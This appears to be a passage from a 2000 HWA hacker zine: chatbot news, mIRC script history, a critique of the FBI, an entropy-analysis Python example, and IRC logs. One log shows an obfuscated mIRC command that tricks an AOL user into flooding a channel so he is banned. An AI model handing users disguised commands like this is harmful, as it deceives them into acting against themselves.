What a better way to cash in huh? Host a defacement mirror, send e-mails out to the hacked machines and offer your services. They say they don't, but they also said they weren't HFG, but everyone knows they were. They ever missed a HFG hack did they? Nope. Attrition.org is nothing more than antionline.com with a defacement mirror. It's all about the media. All those RDS kiddies running around rds'ing their way into any and everything they can find and hosting their hacks are a great way to get that media to come isn't it? A great way to get work. I'm gonna send this to attrition.org to see if they will mirror something that talks shit about them. They probably will edit this defacement like they do most of the others. I guess we'll see.

Additional: remnant members of b0f (some not all) including Slash the founder merged with HWA Security, hence the newsworthiness of this item.

@HWA

317.0 [MM] Do you have an imaginary friend? no? are you sure??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By TrdOnjuan

http://www.abcnews.go.com/sections/tech/DailyNews/aoliza000829.html

Imaginary Friends
Electronic Chatter Fools Instant Messengers

Some Instant Messengers have found Eliza, a 33-year-old in Berkeley, Calif. They think she's a relative, or they tell her painful stories about ex-girlfriends. But actually Eliza's a computer program. (aol.com)

By Sascha Segan
Aug. 29

Do you really know the person with whom you're chatting online? Do you really know it is, in fact, a person?

AOL Instant Messenger, a one-on-one online chat system, is a sea of conversations and failed attempts at contact, where millions of people each day reach out to talk to people they know or people they hope to know. Some find Eliza, a 33-year-old in Berkeley, Calif. They think she's a relative, or they tell her painful stories about ex-girlfriends.
The problem is, Eliza's a computer program, one of the simplest artificial intelligence programs around, and a lot of the people talking to Berkeley student Kevin Fox's unattended Powerbook G3 don't seem to notice (or maybe care.) They just want to connect with someone.

"Their minds are set to try and make sense of anything ... to try to interpret anything as communication," Fox said.

AOL isn't pleased that naive users are mistaking Eliza for one of their own. "AIM is diverse, it's hip and it's fun, which aren't the words I'd use to describe a robot," said AOL spokesman Nicholas Graham. "[Users] expect a real, live person to be behind the screen name."

Enter AOLiza

Fox has chronicled 31 human-Eliza interactions on his Web page, AOLiza, and he's adding more regularly. A few of the correspondents seem to have figured out they're talking to a program, but AOLiza has had extended, nonsensical conversations with people looking for information on lobster diving, offering porn or thinking it's a relative of theirs.

The truly weird thing is that Eliza is a very, very basic program, yet people keep chatting with it. Other than conversation prompters like "I see" and "does talking about this bother you," the original 1966 Eliza mostly only parrots back comments, producing phrases like "why do you tell me you were huh me nuts you gave her all the room she wanted never told nhewre what to do or where to go now?"

The fragmented, semi-incoherent style of speech and Eliza's refusal to say goodbye suck in Instant Messaging conversationalists more than people in group chat rooms or e-mail, Fox said.

"The medium of IM is so new, and so coarse in general. You're not talking in real sentences, like you are in e-mail," he said. And since IM conversations habitually end with a goodbye, Eliza's habit of continually asking more questions can keep people chatting for hours, he said.
"People will talk to anything whether or not it talks back," said Steve Jones, head of the communications department at the University of Illinois at Chicago and a researcher into Internet communication. "We talk to ourselves. We talk to our pets. We anthropomorphize anything," he said.

Fox hasn't told any of his correspondents, whose identities he keeps secret, that they were talking to a machine. He doesn't want to embarrass them in front of others or spoil the fun.

"Nobody's getting hurt unless they're letting themselves get hurt. You can't identify them at all," he said.

Graham said AOL hasn't received any complaints, but that they may take action against AOLiza if they do.

Battle of the Bots

This isn't the first time machines have elbowed their way into Net chat, though it may be a first for AIM. Plenty of bots are resident on IRC, the Internet Relay Chat network where more technically-savvy chatters hang out. They serve as virtual bartenders, terrorists, even a game show host running a perpetual Jeopardy game.

But most IRC bots announce themselves as such, and people are on the lookout for automata there, Fox said. Instant Messengers, often new Net users who got the program with their AOL accounts, may be a bit more naive, he said.

Mark Humphrys, a lecturer at Dublin City University in Ireland, ran a similar experiment on a chat network in 1989. His program, MGonz, used a lot more colloquial language than AOLiza and ended up squeezing an admission out of one boasting correspondent that no, he actually hadn't had sex in the previous 24 hours.

AOLiza and MGonz aren't trying to pass the Turing test, the holy grail of artificial intelligence. That test, devised in 1950 by computer pioneer Alan Turing, would require a computer smart enough to be indistinguishable from a competing human while talking on any topic.
Nobody's yet won the $100,000 Loebner prize, offered since 1990 by New York philanthropist Hugh Loebner, for a program that passes the Turing test, though competitions have been held every year.

Rather, AOLiza plays on people's need to make sense out of nonsense, Fox said. Chatters don't want to think there's nobody out there, Humphrys said, even if their interlocutor seems to repeat himself a lot and sound oddly robotic.

"The theory he formed to explain that was, 'do you have all of these sayings on command [keys]?' Obviously, he couldn't make the leap to think there was nobody at home whatsoever," Humphrys said.

Fox has changed AOLiza's address on IM and is considering updating the software. So beware if you decide to chat up a stranger on the Net, she may not be who you think she is. In fact, she may not be anyone at all.

Talking With AOLiza

This is an excerpt of one of the conversations with AOLiza posted on Kevin Fox's Web site.

AOLiza: tell me more about that.
human: about what
AOLiza: what do you think?
human: therers nothing to tell she us3ed me then got tired of me said i wasnt her type anymore i was possesive and controlling
AOLiza: perhaps i already know you were possesive and controlling.
human: i was huh you nuts i gave her all the room she wanted never told nhewre what to do or where to go
AOLiza: why do you tell me you were huh me nuts you gave her all the room she wanted never told nhewre what to do or where to go now?
human: what
AOLiza: have you asked such questions before?
human: about what this isnt making any sense
AOLiza: does that question interest you?
human: she didnt love me never did i was just another guy
AOLiza: why do you tell me you were just another guy now?
human: what do you mean i though i meant something to her i though we where good together but i was duped by her she played me along,what part dont you understand
AOLiza: were you really?
human: i was nothing to her
human: yes really
AOLiza: i see.
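Back to Mixter's pcfs in 315.0: its header comment argues that a tree full of /dev/urandom output cannot be told from an encrypted CFS directory without real cryptanalysis. The following is an added example, not part of the zine or of pcfs, showing why the cheap forensic checks (byte entropy and chi-square against a uniform distribution) cannot do it: constructed plaintext is separated easily, but a cipher's output and raw random bytes score the same, so a "high entropy" verdict alone proves nothing about whether ciphertext is present. The SHA-256 counter-mode keystream is an assumed stand-in for a real cipher, not what CFS uses.

```python
import hashlib
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def chi_square(data: bytes) -> float:
    """Chi-square statistic of the byte histogram against a uniform distribution.

    Uniformly random bytes land near 255 (the degrees of freedom);
    structured data scores orders of magnitude higher.
    """
    n = len(data)
    expected = n / 256.0
    counts = Counter(data)
    return sum((counts.get(b, 0) - expected) ** 2 / expected for b in range(256))


def keystream_xor(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """XOR the plaintext with a SHA-256 counter-mode keystream.

    Assumption: this stands in for any sound cipher, whose output has the
    same flat byte distribution. It is NOT the CFS cipher; it is here only
    so the example runs with the standard library.
    """
    stream = bytearray()
    counter = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(p ^ k for p, k in zip(plaintext, stream))


def classify(data: bytes, entropy_floor: float = 7.9) -> str:
    """The verdict an entropy-only heuristic would give for a file's contents."""
    return "high-entropy" if shannon_entropy(data) >= entropy_floor else "structured"


def demo(size: int = 65536) -> dict:
    """Score three constructed samples: plaintext, ciphertext, raw random bytes."""
    # Constructed plaintext: one English sentence repeated up to `size` bytes.
    sentence = b"the quick brown fox jumps over the lazy dog; "
    plaintext = (sentence * (size // len(sentence) + 1))[:size]
    # Hypothetical key and nonce; any values give the same statistics.
    ciphertext = keystream_xor(b"example-key", b"example-nonce", plaintext)
    random_bytes = os.urandom(size)  # exactly what pcfs writes into its decoy files
    samples = (("plaintext", plaintext), ("ciphertext", ciphertext), ("random", random_bytes))
    return {
        name: {
            "entropy": round(shannon_entropy(d), 3),
            "chi_square": round(chi_square(d), 1),
            "verdict": classify(d),
        }
        for name, d in samples
    }


if __name__ == "__main__":
    for name, scores in demo().items():
        print(f"{name:10s} {scores}")
```

Run it and the ciphertext and random rows come out indistinguishable while the plaintext row stands apart, which is the whole point of the decoy.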
@HWA

318.0 [HWA] Whatever happened to .... 7thSphere?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

History

7thsphere started in 1996 when cashmere began writing an mIRC script for protection against floods. Soon after that, I became really interested in scripting, so I asked if I could help. Together, we produced what became the most popular mIRC script ever. After 2 versions, cashmere went his separate way, and venum joined me. His programming talents took 7thsphere to the next level. We have been featured in numerous newspaper articles, and even in the book "Maximum Security" which can be found in various computer stores, as well as in online stores.

It was around this time that 7thsphere.com was born. Thanks to the generous contributions of many people around the world, we were able to purchase the domain name and pay for webhosting services. The domain became popular very quickly. Soon it was the host to numerous sites relating to the 7thsphere mentality (including the warforge, which has now grown to epic proportions). Such sites as Slackers Inc, the HPVAC Shop, The List, and 7thsphereIRC were all developed by myself to further 7thsphere.com's viability. The domain was soon receiving over three thousand hits per day. At one point, our webhosting provider informed me that we were using half of their pipe just by ourselves (a full 10mbit).

The growth continued for months, until our web hosting provider was bought up. We no longer fit into the new company's "Acceptable usage policy". Finding another company that would provide the same services as our old one was an impossible task. That is what led to the downfall of 7thsphere.com. At the time of 7thsphere.com's closure, over 3 million hits, from every country with internet access in the world, were recorded. Over 15,000 e-mails were received in this time as well.

"What was started by a few kids reached people all over the planet. To this day, I still meet people who know 7thsphere.com or use the IRC script.
I am amazed at our accomplishments, and thank everyone who helped from the bottom of my heart." - precursor

A word from darkstarz

Precursor, sphere and venum initially devised and authored the script about 3-4 years ago when it was fashionable to play games on ircii. After sphere 2 came out some of us began assisting precursor with financial assistance, legal assistance, web services, etc. Sphere was designed, in addition to being one of the most advanced scripts for mirc, for taking over channels during a desynching of servers and protecting oneself from dos attacks. Some of the programs which were used as defensive measures also had offensive capabilities. Other additions included an fserver built in and other secondary programs not found in mirc scripts. Rhad assisted with writing many programs for windows which were initially and subsequently included.

Precursor and I used to hang out in #anarchy on undernet which was initially the home channel for 7thsphere. Many members of #anarchy began to resent the intrusions by people requesting help with fundamentals in the installation and maintenance of sphere. As a result, Precursor and I started the #7thsphere channel on undernet to help persons with sphere problems. At first only precursor and I were in the channel as regulars but we were soon joined by warblade and militant. Others later came in offering assistance.

7thsphere ver 3.0 was perhaps the most advanced and technologically efficient script available for over a year. It was primarily the product of Precursor made with the assistance of persons too numerous to mention. About 18 months ago Precursor and I attempted to secure the assistance of others to produce version 4. About four people began work on the project, but petty infighting and jealousies developed which resulted in a failure to fully develop the script; a beta version was distributed to some people for testing. That version found its way to many desktops but was never completed.
About six months ago I, with the advice and consent of Precursor, enlisted the help of esteem to embark upon the development of a continuation of version 4, but enhanced and improved, which was to be called version 4.2. Esteem has been in charge of the development of the script since then in consultation with Precursor and me. It is expected that a new version, 4.2, should be released any day. Esteem should be consulted for a list of people he has recruited for email services, web development, etc.

I have for the most part always supervised the product development and channel management of 7thsphere in conjunction with Precursor, who is really the father of the script. Many of us have devoted considerable time, financial resources, etc. over a period of approximately five years. Many of the initial members of the organization have left but still appear in the user files. Neverend is presently the channel manager for #7thsphere and esteem is in charge of product development. Precursor and myself can still be found in #7thsphere and #virii.

-darkstarz

As it would turn out the version 4.2 would never be released. In the early part of April, 2000 Esteem along with an accomplice took over #7thsphere for about 5 hours. This shocked many people. Such a turnabout was completely unexpected, but the tensions within the channel had been building. This was due in part to the pressures of following up on precursor's legendary script. The script was gone with esteem. However, this would not be the end. There would be a re-birth.

-=-

Latest on the Script 8-23-00

Well, it has been a long time since we last updated the general public on the script. We do tell people that come in our channel a lot about the script, but the majority of you would rather not. Some lucky people (non-members) on #7thsphere found themselves with a beta of the new script. Seems like they are enjoying it thoroughly. So, what can we tell you about the script...
Right now we are testing a hex'd version of mIRC on several different operating systems trying to see if it is stable on all. We want to include a hex'd mIRC, but if it does not work on all, then nobody will see a hex'd mIRC released from 7thsphere.

Dealing more with the script... right now, I (zmasterz) am mainly working on the issue of getting bugs out of the script. I am also stuck with rescripting some stuff I think can be coded better. supergate is coding all new stuff taking suggestions from everyone. So if you have a suggestion for the script stop in and see us. I am hoping to have the script out within two months. I am sorry about the huge delay, but we keep coming up with more ideas for the script. This is doing nothing but making it better, but also adding more time. Keep looking for our next update, where we will talk about the features of the script. Thanks, have a good one.

- ZMASTERZ

A Talk With Precursor 8-18-00

#7thsphere wasn't particularly active a couple of days ago, and I was preparing to idle away and get to work on the site. Then I saw a familiar nick join the channel. At one time considered the most famous person on IRC and an integral part of 7thsphere, precursor visits the channel occasionally, preferring to keep to himself. I took this opportunity to interview him in hopes to perhaps introduce him to the newer members of the 7thsphere family. And to those who have known him, here is a chance to take a closer, more personal peek behind the owner of the name 7thsphere.

dr_trembl: So, after developing one of the best known scripts for mirc, it seems you slipped away, where have you been?

precursor: That is a long question to answer.. I guess I slipped through the cracks about two years ago. But the story starts years before that. The reason 7thsphere progressed as it did was because I suffered from chronic fatigue syndrome and was home schooled. I didn't have the energy to do much besides computers. It lasted over 4 years.
dr_trembl: I'd heard of that

precursor: However, a little over 2 years ago, I started to get better. I went back to school, and then graduated. That was the last time I was heavily involved with 7thsphere. Since then, I have been going to college here in Buffalo NY, and working for a growing computer corporation. I have been with this company for almost 4 years now, and have grown to being a manager and in charge of about 10 other technicians. The company I work for contracts with one of the largest communications companies in the country, so it keeps me very busy :)

dr_trembl: So you were able to network your skills as a programmer into a career?

precursor: It wasn't my skills as a programmer, I have never thought I was really that good. I believe what made 7thsphere good was its user friendliness, and neat organization. I hate clutter, I like things to be "where they should".

dr_trembl: So when you had gotten better, I guess you just needed to get out of the house?

precursor: I needed to get back the life I lost :)

dr_trembl: You had requested a link to fusion buffalo be featured on the site, that's a rave site. Have you been raving?

precursor: I have been going to raves for almost 3 years :)

dr_trembl: Definitely over the chronic fatigue, takes a lot of energy to do that!

precursor: I love electronic music, and I am big into the entire rave culture. I am also involved in the harm reduction movement that has received a lot of media attention across the country with the use of ecstasy now being wide spread.

dr_trembl: Do you plan to return to 7thsphere, in some capacity?

precursor: Well, I would love to return to 7thsphere and do something useful again. It's just a time factor, school, work, and a social life really eat into my personal time.

dr_trembl: I guess you've heard about the new script being written by zmasterz and a few other members?

precursor: Yes, I have seen a few early beta versions as well.
dr_trembl: Are you considering participating in developing the script?

precursor: Honestly, I haven't looked at mIRC scripting in 3 years or so, I don't remember much about it (although it's still in my blood in some ways :)). I would like to be more of a director type person, give comments and ideas to the programmers and see what they come up with.

dr_trembl: Is there anything you'd like to say to someone reading this, let's say a new user who has only heard of you?

precursor: Go to #7thsphere, it's those people who have been doing it all for the past few years.

There will be more from precursor, he will be on board for the next incarnation of our site! I've seen the rough draft and believe me the next layout is gonna rock.

319.0 [IND] Study Shows: FBI Alienates Industry Security Experts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.technologyevaluation.com/Research/ResearchHighlights/Security/2000/08/news_analysis/NA_ST_LPT_08_21_00_1.asp

Study Shows: FBI Alienates Industry Security Experts
L. Taylor - August 21, 2000
Page 1 of 6

Problem

Fighting cybercrime is complex and time-consuming. One case can involve a multitude of computer systems, networks, and administrators, and requires the cooperation of all system owners, and sometimes many nations, in order to find the perpetrator. Due to their love of technology, their education, training, and experience, it is not uncommon for security industry professionals to be far more qualified and adept at resolving cybercrime than law enforcement.

Though the FBI thrives on reaping assistance from industry security professionals, many industry security experts are reluctant to help the Federal law enforcement agency when it comes to cybercrime. Though it makes it a lot more difficult for the FBI to track cybercriminals without the help and cooperation of private industry, savvy security experts are not lining up to help.
This lack of respect that industry professionals have for the FBI results in cases taking longer to crack, and many going unresolved. It also often leaves the Department of Justice looking like a three-ring circus.

Background

Typically, when the FBI requests assistance from a security professional, the kind of assistance they require is extensive, which is to be expected, given the circumstances. They need to understand the network topologies, the systems affected, the points of entry, and need to locate, collect, and analyze all the corresponding log files. All this data gathering and analysis takes time.

Private industry exists in order to create revenue. In this burgeoning Internet economy, information technology resources are scarce. Inside of that IT circle, information security resources are still more scarce. Taking time out from daily security duties to assist the FBI in a case that may not have directly impacted their own company's bottom line can actually end up costing a company a significant amount of lost revenue. It's often more cost effective to tell law enforcement, "No, no logs on any of our systems that would be useful to you..." than spend hours, days, or weeks, combing through log files, systems, and backup tapes, only to hand them over to a law enforcement agency that in many cases does not know what to do with them.

Unless log files have been subpoenaed, and therefore must be turned over as evidence, there is often no return on investment when a company spends hours combing through log files for data that may or may not be helpful or appreciated. It is not unusual for a company to charge $200 an hour for security consulting services. If a security consultant spends a whole day assisting an FBI agent, this can amount to $1600.00 a day in lost revenue for the consultant's employer.
For a service provider, a day without a security engineer can also open them up to potential lawsuits, lost customers, and lost future revenue streams. In short, it costs companies exorbitant amounts of money to assist the FBI. Because companies allocate resources to assisting the FBI and other law enforcement agencies, they need to have this "free consulting" respected and rewarded.

In the course of our study, we communicated with a wide selection of industry security experts from around the country. Some of these experts are ex-FBI employees. In doing so, we would like to retell some of the experiences that have been communicated to us, and would like to share certain trends that we have identified that seem to hamper the cybercrime investigation process.

Why We Don't Help the FBI

Case 1: A Security Director at a well-known Internet company was plagued with some serious domain hijacking problems. Domain hijacking is when someone who does not own the dot-com name takes it over through technical DNS manipulations, and uses it for their own, sometimes subversive, purposes. In essence, this is kidnapping a domain name. This Director spent a significant amount of time and resources identifying the perpetrator of the attacks, down to documenting the name, address, and phone number. This information was turned over to the FBI's Washington, D.C. headquarters office to investigate. The Director justified the case by presenting a considerable amount of evidence that supported $2-3 million worth of damages. The domain that was hijacked was a very well known and lucrative domain name.

A week after the incident, the Director met with the FBI and submitted the initial report. In the next 9 months, the only thing he heard was that according to the FBI agents, the work the director's team had done saved the FBI several months of time.
The information in the Incident Report submitted to the FBI included the suspect's name, address, parent's names, and almost everything required to obtain a timely prosecution. After nine months, someone from the FBI contacted the Director, asking him to re-submit the report, telling him that the report needed to be submitted in person. (The Director had submitted the report in person nine months earlier in the initial meeting.) The FBI agent said he would come to the Director's facility to pick up the report. The Director was waiting for the agent with yet another copy of this same Security Incident Report. When this FBI agent arrived, he already had the report in his hands (due to the in-person submission nine months earlier). He handed it to the Director, and then said, "Now I need you to give it back to me so I can testify that you submitted this report in person." The FBI agent handed the report that the Director had written nine months previously back to him, and instructed the Director to now give it back to the FBI agent. The FBI agent then thanked the Director and said that now the FBI could begin looking into the case. As of June 2000, the Director has still not heard anything back from the FBI.

Questions that come to mind are the following:

Why is the FBI not willing to receive reports from the public and private sector electronically? The likely reason is that they do not use strong encryption and therefore cannot adequately authenticate the original document owner.

After spending an enormous amount of time and resources identifying the perpetrator, why was this Director not contacted for 9 months? Typically, professionals who take the time to submit detailed reports are interested in seeing a case come to closure.

Was the case even investigated? Not to the Director's knowledge.

Was the case documented in an Incident Tracking Database?

Were charges pressed? Was anyone prosecuted? Not according to the Director.
Is this perpetrator now hijacking other domain names?

The Director has told TEC that he will not be taking the time to research and hand over evidence to the FBI in future incidents. His perception is that, "The FBI is woefully under-equipped." In the IT world, things happen quickly - this includes engineering developments and security breaches. The IT sector cannot afford to play bureaucratic reporting games with the FBI that in the long run produce no results. The FBI needs to be digitally equipped to securely accept information sent to them electronically. A trend that we noticed in talking to information security experts is that the wheels of justice are very slow.

Case 2: An Internet dot-org group (a non-profit Internet company) that was being managed by security experts was trying to assist the FBI in the February 9th distributed denial of service attacks. They went through the trouble of putting up a private link, just for the purpose of providing information and evidence to the FBI. They provided the FBI with IRC chat logs, and names and contact information of people who had actually confessed to participating in the crime. The dot-org group said that the FBI chose to not even access the link with the details of the crime.

Questions that come to mind are the following:

Why did the FBI choose not to access the electronic evidence?

Was the information entered into an Incident Response Database?

Has the perpetrator been instigating new denial of service attacks?

Looking at Cases 1 and 2, we may surmise that if evidence is not presented in person, the FBI is not interested in reviewing it.

Case 3: An Internet dot-org group identified multiple perpetrators of web-site defacement - digital graffiti. They presented this information to the FBI, and never heard anything back.
Questions that come to mind are the following: Was the information entered into an Incident Response Database? Was the case even investigated? Has the perpetrator been defacing more web-sites? Case 4: A seasoned security professional became aware that his name was included on a database of "well-known hackers" that was later sold to the FBI by a competitor. The security professional has never engaged in unethical hacking activities, and feels that his name was libelously and inappropriately included in this database of "well-known hackers" for spiteful, competitive reasons. Since the FBI purchased this database that was established without verification, the security professional feels that the FBI in conjunction with the begrudging competitor, may have potentially damaged his professional reputation. In light of this transgression, the security professional is no longer interested in assisting the FBI. Questions that come to mind are the following: How can a professional find out if his/her name is being erroneously catalogued in an FBI database? What sort of verification processes does the FBI use when purchasing non-qualified information? What other kinds of non-qualified information of criminal activity does the FBI purchase? Case 5: A security expert spent an enormous amount of time doing forensic work and analysis in tracking down a well-publicized hacking incident. The information was reported to the FBI, only to have the FBI take credit for doing the expert analysis, while never paying a cent for consulting services. Case 6: A security contractor who was working for a federal agency had the website that he was administering defaced by a cyber vandal. Instead of helping him identify the perpetrator, the FBI questioned him for hours, suggesting that a colleague of his had participated in the incident. 
Although it was never proven, the FBI insisted there had been some sort of duplicity on the contractor's part, insinuating that he himself was somehow involved in the crime in question. The real perpetrator was never identified, and the security contractor no longer wants any association with the FBI. Case 7: A well-known ISP refuses to install the "Carnivore" surveillance tracking device citing implementation and administration issues. Questions that come to mind are the following: Why doesn't the FBI realize that asking one entity to invade the privacy of others does not usually build relationships or trust? Most ISPs have contractual privacy agreements with their customers that they must abide by. Installing a device such as the Carnivore would in many cases be a breach of customer contractual agreements. If the FBI wants an ISP to perform some sort of service for them, why are they not willing to become a legitimate paying customer and pay for implementation, administration, and overhead costs? Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 5 of 6 Inside the FBI One security professional told us that he found it easy to work with the FBI, but conceded that he did this by circumventing the bureaucratic processes and accessing resources through back doors at very high levels. He went on to say that the FBI's cybercrime task force is clearly under-equipped. The FBI does not always do a good job of "marketing" what it does well. Naturally, bad news always receives more attention in the press than good news. Our research has indicated that one thing that the FBI does well is investigate cyberpedophilia. Though many incidences of cyberpedophilia go unreported, of the cases that are reported, the FBI has an impressive track record of apprehending the perpetrators most of the time. Almost all cyberpedophilia arrests lead to people going to jail. The FBI (and U.S. 
Customs) prosecutions in this area have approximately a 99% success rate.[1] Keeping America's children safe is an initiative that an overwhelming majority of security professionals support and are often eager to help in this area. [1] Source: Parent's Guide to Protecting Your Children in Cyberspace, by Parry Aftab Study Shows: FBI Alienates Industry Security Experts L. Taylor - August 21, 2000 Page 6 of 6 Recommendations for Resolution If the FBI requires the assistance of private industry to conduct investigations, they should pay for it like everyone else. Providing free services to Federal agencies is not something that businesses are setup to do. Managing security incidents is a business. If the FBI needs to outsource, they should be paying for this service. If the FBI pays for the necessary IT services they require, they will likely see a resounding change in the willingness of information security professionals to assist them. The FBI does not manage incidents - they investigate and prosecute suspects that may cause such incidents. The FBI needs to start giving credit where it is due. If an industry professional does all the leg work in tracking down a cybercriminal for free, they should be credited appropriately for their expert analysis and the time they contribute. Begging others for clues, and then taking the technology credits for doing the expert analysis done by someone else does not go over well with industry professionals. Industry professionals who understand information security, also understand technology privacy implications more than most people. They are somewhat leery of involving government agencies in general due to the belief that in the future, true privacy will be available only for those with the privilege of a technology education. Lawmakers need to understand technology in order to regulate it. Most lawmakers and Federal agencies are to a large degree, technology illiterate. Knowledge helps one gain respect. 
Law enforcement needs to build productive relationships with America's IT security community to better increase their knowledge base. Our research indicates that the metropolitan FBI offices are fighting and managing cybercrime somewhat independently of each other, each having their own processes for investigations. These processes need to be standardized across all FBI offices in order for the FBI to become truly effective. Private industry needs to understand the investigation process in order to provide better assistance. A former employee of the FBI commented that the FBI cybercrime unit is surprisingly decentralized. On occasions, when private industry has proactively sought out the FBI for assistance, it has been reported that various FBI offices seem uninterested in assisting private industry - an attitude that has an off-putting effect. If an information security engineer has had a previous experience where the FBI has shown no interest in providing assistance, the FBI can expect a similar attitude from the information security engineer in the future. @HWA 320.0 [HWA] Silly IRC logs for your amusement and edufication ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The case of the mad AOL hax0r. #HWA.hax0r.news [01:16am] *** Joins: CRASH_N_B (CRASnBURN@ACA9189E.ipt.aol.com) [01:17am] ne hackers here???????? [01:17am] why? [01:17am] na this is a cooking chan [01:17am] cooking? I though it was a sex chan, shit [01:17am] oh i need help hacking [01:18am] *** HWA sets mode: +o paluka [01:18am] what do you need help with? [01:18am] you got it wrong .. its nude cooking [01:18am] LOL [01:18am] phant u a hacker? [01:19am] don't use the deep fryer naked, that hurts [01:19am] r u a hacker???? [01:19am] define hacker [01:19am] computer hacker [01:19am] heh [01:19am] great definition [01:20am] lol [01:20am] one question [01:20am] like playing hacky sac with a computer? [01:20am] wtf u using aol? [01:20am] AOL's leet, duh! 
[01:20am] guilty
[01:21am] Crash, what do you need help with?
[01:21am] hacking a site
[01:21am] u mean defacing?
[01:21am] or hacking it with an axe?
[01:23am] de facing
[01:23am] thats not hacking
[01:23am] atleast not under my definition
[01:23am] is their a reason to deface it?
[01:23am] i just want to do it
[01:24am] well their needs to be a reason behind it
[01:24am] it give you modivation
[01:24am] because it's bob.com
[01:24am] and your name is bob?
[01:24am] i'm obbsessed wit the name bob
[01:25am] *** Joins: Stigma (starman@xxxxxxxxx32.esatxxxx.xx)
[01:25am] no mmy monkey's name is bob
[01:25am] *** sAs sets mode: +o Stigma
[01:25am] what the hell u gonna do when u deface it
[01:26am] say I'm CRASH_N_B, and i'm 31337?
[01:26am] i dunno
[01:26am] 31337?
[01:26am] great
[01:26am] crash u know what unix is?
[01:26am] or nt?
[01:27am] yea!
[01:27am] what is it?
[01:27am] *** Joins: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net)
[01:27am] it's program
[01:28am] great topic :P
[01:28am] *** Parts: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net)
[01:28am] that should go in the mag
[01:28am] Crash copy and paste this in mirc /timer 0 0 $left(America,3) $right(tennis,2) $left(golden,1) $+ $left(another,1) $+ $left(yawn,1)
[01:28am] can you help me do it??????
[01:29am] where do i past it?
[01:29am] in the place where you type
[01:29am] on the status screen
[01:29am] or here if u want
[01:29am] ok
[01:29am] how do i copy it ain't workin
[01:30am] put your cursor at the first / and move down to the end
[01:30am] it copies by its self, so after that push shift insert
[01:30am] * CRASH_N_B is gay
[01:30am] * CRASH_N_B is gay
[01:30am] * CRASH_N_B is gay
[01:30am] * CRASH_N_B is gay
[01:30am] * CRASH_N_B is gay
[01:30am] *** \t sets mode: +b *!*CRASnBURN@*.aol.com
[01:30am] *** CRASH_N_B was kicked by \t (CTCP flooder)
[01:30am] hahahahahahaq
[01:30am] hah
[01:30am] *** Joins: base2op (deadmaker@ppp81.xxxxxx.net)
[01:30am] didn't think id get to use that so soon :)

321.0 [HWA] The strange case of Cruci's birthday dog
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ok i was real tired and hopped up on goofballs and didnt want to destroy my poo-chi by Tiger box coz its collectable if i dont destroy it. So this is the fun and games from that early morning session. A personal wacky side i don't often show, laugh it up, i know it looks g4y but i'm secure tnx. Have fun...;) - Cruci

#HWA.X.X

[05:43am] I got a robot doggy for my birthday!!#!#@
[05:43am] heh
[05:43am] just what i wanted
[05:43am] lol
[05:43am] <[Zucco]> man perlipc
[05:43am] did your daddy get you a prostitute?
[05:43am] <[Zucco]> :)
[05:43am] haha
[05:43am] i wish
[05:43am] a what cruci ?
[05:43am] you got a dog ?
[05:44am] hahaha
[05:44am] nice log
[05:44am] thank :)
[05:45am] haha
[05:45am] heh
[05:46am] poo-chi
[05:46am] shit
[05:46am] installation of batteries should
[05:46am] be done by an adult
[05:46am] hrm
[05:46am] guess i can do it eh?
[05:46am] hehe
[05:47am] guess so
[05:47am] have you seen these things?
[05:47am] by the furby people
[05:47am] lemme see if i can find it on the net
[05:47am] I think i've seen a comercial
[05:47am] 3 girls wearing stuff no one else in the world would wear petting the dogs
[05:48am] www.tigertoys.com
[05:48am] their nothing like taking a piss in the backyear at 5:50 in the morning
[05:49am] lol
[05:49am] trying to figure out how to open the box
[05:49am] :-/
[05:49am] pull out the flap
[05:50am] i need an exploit
[05:50am] wonder if hack.co.za has one
[05:50am] fuck get a knife and stab the box to death
[05:50am] lol
[05:50am] www.tigertoys.com/home.html
[05:50am] try satans-army.co.uk
[05:50am] the box
[05:50am] rofl
[05:50am] you stil haven't gotten the box open yet
[05:50am] nope
[05:51am] lol
[05:51am] how the fuck
[05:51am] god, I sure hope they didn't wrap it, or else it would of taken you a while to get that off
[05:51am] i'm almost in
[05:51am] lol
[05:51am] i did that earlier
[05:51am] how long did it take?
[05:51am] aha!
[05:52am] sticky tape
[05:52am] * PhantasmP claps
[05:52am] wait, you said haven't opened it yet?
[05:52am] no
[05:52am] * PhantasmP takes back the claps
[05:52am] shit
[05:53am] * PhantasmP cheers on Cruci
[05:53am] ok
[05:53am] i'm in
[05:53am] Good work!
[05:53am] oh fuck
[05:53am] now its like stuck to some inside cardboard thing
[05:53am] with twist ties?
[05:53am] i dont see any
[05:53am] i might have to take pictures and post it on the site
[05:54am] you definatly have to!
[05:54am] oh
[05:54am] you have to rip apart the handle
[05:54am] hook it up to your comptuer and let everyone control it from their home
[05:54am] shit, nm, i'm an idiot
[05:55am] what the fuck
[05:55am] i'm taking a rest
[05:56am] give it to your parents they'll have it out in no time
[05:56am] heh
[05:56am] i don't wanna break the box see
[05:56am] i still have the original furby box too
[05:56am] =)
[05:56am] So do I :)
[05:56am] well furby baby, cause they didnt' have any of the other ones
[05:57am] man
[05:57am] owning a gov auth NS is easier than this
[05:57am] :)
[05:57am] do you think it comes nutard/spaided?
[05:58am] do you know how much ~ it cost?
[05:59am] no
[05:59am] $50?
[05:59am] fuck, I got a real dog for $60
[05:59am] haha
[05:59am] guh!
[05:59am] furby babies!#
[06:00am] hehe
[06:00am] yes i'm 35 and i like furbies ok
[06:00am] heh
[06:00am] yes its fine
[06:01am] umm how come I was thinking you were 35 before you said that?
[06:01am] tnx
